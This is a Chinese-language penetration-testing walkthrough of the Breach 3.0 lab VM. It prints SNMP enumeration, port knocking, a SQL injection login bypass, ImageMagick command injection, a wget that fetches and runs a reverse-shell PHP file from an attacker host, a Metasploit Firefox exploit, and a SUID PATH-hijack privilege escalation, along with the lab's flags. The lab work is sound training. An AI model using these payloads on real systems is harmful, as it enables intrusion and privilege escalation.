Breach 3.0 靶机渗透测试完整教学文档

靶机概述

Breach 3.0 是一个包含多层网络环境的复杂靶机，涉及端口敲门、SNMP信息泄露、Web应用漏洞、内网渗透、虚拟机逃逸等多种技术。本教学文档将详细记录从信息收集到最终获取所有flag的完整过程。

初始信息收集

靶机发现

使用ARP扫描发现靶机IP：

arp-scan -l

发现靶机IP为192.168.206.144（后续可能变为192.168.206.145）

端口扫描

初始TCP扫描无结果，考虑以下可能性：

1. 扫描命令错误
2. 只开放UDP端口
3. 需要特定条件才能开放端口（如端口敲门）

扫描UDP端口：

nmap -sV -p- -sS -T4 -Pn --min-rate 1000 -sU 192.168.206.144

发现开放161端口（SNMP服务）

SNMP信息收集

SNMP枚举

使用snmpwalk收集信息：

snmpwalk -Os -c public -v 1 192.168.206.144

关键信息：

• 邮箱：Milton@breach.local
• 电话号码：(545)-232-1876
• 主机名：Initech-DMZ01
• 注释："Initech - is this thing on? I doubt anyone thinks to look here, anyways, I've left myself a way back in and burn the place down once again."

端口敲门

根据SNMP获取的电话号码尝试端口敲门：

knock 192.168.206.144 545 232 1876

敲门后重新扫描，发现开放新端口

Web应用渗透

初始访问

发现HTTP服务运行在8端口，访问后需要登录：

• 用户名：milton
• 密码：thelaststraw（来自Breach系列第一个靶机）

目录扫描

使用dirsearch扫描：

python3 dirsearch.py -u "http://192.168.206.144:8/breach3"

发现/images和/blog目录

SQL注入

在登录处发现SQL注入漏洞，手工注入payload：

1' or'1'like'1

成功登录为admin用户

命令注入

在livechat.php页面发现命令注入点：

http://192.168.206.144:8/breach3/thebobscloudhostingllc/livechat.php?searcher=Submit

测试发现可执行命令但无法出网

权限提升

用户切换

发现samir用户具有sudo权限可执行chmod：

User samir may run the following commands on Initech-DMZ01:
    (thebobs) NOPASSWD: /bin/chmod

SSH密钥利用

在thebobs用户的.ssh目录发现权限配置不当（777）：

1. 将公钥写入authorized_keys
2. 设置正确权限：

sudo -u thebobs chmod 700 /home/thebobs/.ssh/
sudo -u thebobs chmod 600 /home/thebobs/.ssh/authorized_keys

3. 使用SSH连接：

ssh thebobs@192.168.206.144 -i ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa

获取第一个flag：

breach3{the_dmz_is_burning}

内网渗透

内网发现

发现内网网段192.168.122.0/24，使用nmap扫描发现两台主机

端口转发

使用SSH隧道转发内网服务：

ssh thebobs@192.168.206.145 -i ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa -L 4455:192.168.122.65:80

ImageMagick漏洞利用

在PDF转换服务中发现ImageMagick命令注入：

convert "pdfconverter.php.pdf | `sleep 5` " 1.png

写入Webshell：

http://127.0.0.1:5566/intranet/6.php

反弹Shell

1. 本地准备反弹shell的PHP文件
2. 靶机下载并执行：

wget http://192.168.206.132:9966/shell2.php
php shell2.php

获取第二个flag：

breach3{what_secrets_is_bill_hiding?}

最终权限提升

内核漏洞尝试

尝试多种内核提权漏洞（如dirty cow）但失败

浏览器漏洞利用

发现内网主机使用Firefox/22.0（存在漏洞），使用Metasploit模块：

exploit/multi/browser/firefox_tostring_console_injection

SUID提权

发现/home/blumbergh/swingline具有SUID权限，分析发现执行ncat命令

环境变量劫持提权步骤：

1. 创建恶意ncat文件：

echo '#!/bin/bash' > ncat
echo 'cp /bin/bash /tmp/shell' >> ncat
echo 'chmod +s /tmp/shell' >> ncat
chmod +x ncat

2. 设置PATH环境变量：

export PATH=/home/blumbergh:$PATH

3. 执行swingline程序：

./swingline

4. 运行提权后的shell：

/tmp/shell -p

获取第三个flag：

breach3{the_final_countdown}

总结

本靶机涉及的关键技术点：

1. SNMP信息收集与利用
2. 端口敲门技术
3. Web应用SQL注入
4. 命令注入漏洞利用
5. SSH密钥错误配置利用
6. 内网渗透与端口转发
7. ImageMagick漏洞利用
8. 浏览器漏洞利用
9. SUID与环境变量劫持提权

通过这个复杂的多层靶机，可以全面练习从外网渗透到内网横向移动的完整攻击链。